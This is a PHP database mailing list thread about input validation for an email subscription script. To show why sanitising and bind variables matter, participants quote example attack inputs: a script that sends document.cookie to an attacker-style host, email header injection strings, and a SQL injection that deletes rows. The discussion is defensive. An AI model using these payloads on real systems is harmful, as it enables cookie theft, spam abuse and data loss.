Martin Norland wrote:
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber
is already in a list before subscribing his email (so as to prevent
double subscription). the select part works fine....but the insert
doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'<script>
document.location =
"http://www.evilkid.net/?stolencookie"+document.cookie;
</script>';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to
another site of their choosing :P. I would be more worried about it
being equal to things like:
"Spam my Enemy <myenemy@xxxxxxxxxxx>"
+ "Spam my Enemy also <myenemy@xxxxxxxxxxx>"
+ etc.
or
"\r\nFrom: Idiots Inc. <official@xxxxxxxxxxxxxxxxxx>"
or
"'; Delete from arbitrary_table_name where 'yes'='yes"
ah yes - that would an effective attack in/on an email ;-)
All of which are easily prevented with some attention to detail. (or in
some cases newer versions of software, which explicitly allow only one
statement per call). Finally - the concept of bind variables (or
equivalent) are your friend (as Jochem already knows with firebird iirc).
yes indeed! praise to the guy who wrote the new firebird extension :-),
savin' my ass on a daily basis :-)
Cheers,
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
